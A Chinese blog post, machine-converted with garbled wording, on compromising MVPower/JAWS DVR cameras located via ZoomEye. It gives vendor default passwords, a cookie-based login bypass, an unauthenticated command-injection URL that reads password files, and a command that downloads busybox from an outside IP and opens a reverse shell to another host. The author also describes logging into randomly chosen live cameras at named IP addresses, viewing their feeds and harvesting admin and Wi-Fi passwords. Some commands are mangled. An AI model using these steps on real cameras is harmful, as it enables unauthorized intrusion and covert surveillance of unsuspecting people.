使用Zoomeye滲透網絡攝像頭

使用Zoomeye滲透網絡攝像頭

simeon

    網絡攝像頭（IP CAMERAS）在日常生活中越來越普及，交通路口抓取車牌号碼，幼稚園用來監控小孩，小區車牌識别系統等等，這些攝像頭會跟計算機或者錄像等硬體裝置連接配接，以便進行圖像存儲和及時浏覽。很多攝像頭還直接跟網絡連接配接，以友善客戶通過浏覽器或者用戶端進行連接配接管理和檢視。商家的本意是為了友善使用者進行檢視，但很多網絡攝像頭由于廠商對安全重視不夠，黑客通過技術手段可以很友善對存在漏洞的網絡攝像頭進行存取和浏覽，在有些情況下，還可以擷取網絡攝像頭所在伺服器的權限，甚至可以滲透進入該攝像頭所在網絡，危害實在很大。

一、存在漏洞分析

   AndrewTierney在其Blog上公布了一片有關攝像頭漏洞利用的文章（https://www.pentestpartners.com/blog/pwning-cctv-cameras/）。歸納其核心如下：

   1.存在弱密碼漏洞

   簡稱為“CCTV”（Mvpower 8 Channel Security DVR Full D1 H.264CCTV Real-time Network Digital Video Recorder Mobile Motion Detection,P2P HDMIAlarm Email for CCTV Surveillance Cmeras System）amazon購買位址http://www.amazon.co.uk/dp/B0162AQCO4，存在弱密碼admin密碼為空。收集的其它幾款網絡錄影機的密碼如下：

 （1）海康威視IP網絡錄影機：超級使用者：admin，超級使用者密碼：12345。

 （2）大華網絡錄影機：使用者名：admin，密碼：888888。

 （3）天地偉業網絡錄影機：使用者名：Admin，密碼：111111

2.登入密碼繞過漏洞

   我們可以對之前用預設密碼成功登入的頁面進行抓包，找到處理頁面登入邏輯的js，對處理頁面登入的邏輯分析發現，存在登入繞過漏洞，代碼如下：

$(document).ready(function(){

         dvr_camcnt= Cookies.get("dvr_camcnt");

         iSetAble= Cookies.get("iSetAble");

         iPlayBack= Cookies.get("iPlayBack");

         dvr_usr= Cookies.get("dvr_usr");

         dvr_pwd= Cookies.get("dvr_pwd");

         if(iSetAble== '0'){

                 $('#pb_settings').css('display','none');

                 }

         if(iPlayBack== '0'){

                 $('#pb_review').css('display','none');

         if(dvr_camcnt== null || dvr_usr == null || dvr_pwd == null)

         {

                 location.href= "/index.html";

         }

   系統管理頁面直接通過js檢查cookie是否為空來判斷使用者是否登入。現在竟然還有程式員這樣來寫登入狀态判斷。

<a href="http://s5.51cto.com/wyfs02/M02/7B/56/wKiom1bL1USC6rH2AAFzzYNqrMw835.jpg" target="_blank"></a>

圖1密碼繞過漏洞

3.直接擷取webshell及其root密碼

<a href="http://s1.51cto.com/wyfs02/M01/7B/56/wKiom1bL1VDTXzrQAABnsrigk70092.jpg" target="_blank"></a>

圖2擷取webshell

4.擷取反彈shell

  執行以下指令：

  cd/root/rec/a1 &amp;&amp; wget http://212.111.43.161/busybox &amp;&amp;chmod +xbusybox&amp;&amp; ./busybox  nc 122.115.47.398000 -e /bin/sh -e /bin/sh，将反彈shell至122.115.47.39的8000端口。還可以執行指令“http://www.antian365.com/shell?/usr/sbin/telnetd-l/bin/sh -p 25”通過telnet 目标IP直接進入系統。

二、實戰演練

   通過上面的漏洞分析，我們可以對存在漏洞的CCTV網絡攝像頭進行實際漏洞測試，以驗證漏洞的真實性和掌握漏洞利用方法。

   1.确定cctv網絡攝像頭關鍵字“JAWS”

  在kaliLinux中打開bannergrab，填上裝置的IP位址和web端口号，banner抓取結果如圖3所示，其中關鍵字為Server後的字元串“JAWS”。

<a href="http://s2.51cto.com/wyfs02/M02/7B/55/wKioL1bL1crQVGNjAADIzz-xvqw213.jpg" target="_blank"></a>

圖3擷取關鍵字

2.快速擷取存在的目标伺服器

<a href="http://s3.51cto.com/wyfs02/M00/7B/56/wKiom1bL1WmiH3cDAAI6Dgcx-GA723.jpg" target="_blank"></a>

圖4檢索關鍵字“JAWS”

3.随機對目标進行通路

   在檢索結果中随機對結果進行通路，打開http://223.255.146.74/，使用者名輸入admin密碼為空，直接登入系統，如圖5所示，可以檢視監控的房間和畫面。

圖5擷取通路權限

4.直接擷取通路密碼

  使用指令“shell?cat%20/tmp/usrm.ini”可以直接擷取通路密碼，例如http://210.21.34.206/shell?cat%20/tmp/usrm.ini可以擷取預設管理者密碼為空，如圖6和圖7所示。将預設密碼進行修改後，重新通路，其密碼已經寫入到/tmp/usrm.ini檔案中。

<a href="http://s4.51cto.com/wyfs02/M00/7B/56/wKiom1bL1beD5HihAAC-2f4McDQ466.jpg" target="_blank"></a>

圖6直接擷取管理者密碼

<a href="http://s3.51cto.com/wyfs02/M01/7B/56/wKiom1bL1cPD5oanAADDXocSq4M073.jpg" target="_blank"></a>

圖7修改後的密碼直接明文儲存

   5.擷取無線網絡密碼

   在其網絡設定中可以直接擷取其無線AP的名稱及其密碼，如圖8所示。

<a href="http://s3.51cto.com/wyfs02/M02/7B/56/wKiom1bL1dSA8N-2AALQtHrDJrs509.jpg" target="_blank"></a>

   6.反彈shell測試

   對部分目标進行了反彈shell測試，均為成功，可能是無寫權限，下載下傳http://212.111.43.161/busybox檔案大概需要100M。

三、防範措施及建議

  目前網上已經出現利用該漏洞惡意程式，而官方未釋出相應更新檔。使用者可采取以下措施加強安全：

1.修改預設root密碼為其他強健密碼。

2.對外不提供web通路。或者将位址設定為一個複雜的名稱，使其預設位址不被通路。

3.對伺服器可寫進行嚴格限制。

4.修改預設admin密碼。

參考文章：

1.http://www.freebuf.com/tools/5950.html

2.http://www.ijiandao.com/safe/cto/5450.html

3.http://www.myhack58.com/Article/html/3/8/2015/64210.htm

4.http://hb.ifeng.com/3c/detail_2014_04/04/2083399_0.shtml

5.http://security.zol.com.cn/443/4439365_all.html

6.http://bobao.360.cn/news/detail/1388.html

7.http://www.myhack58.com/Article/html/2/5/2015/58087.htm

8.http://drops.wooyun.org/category/papers

 本文轉自 simeon2005 51CTO部落格，原文連結:http://blog.51cto.com/simeon/1744228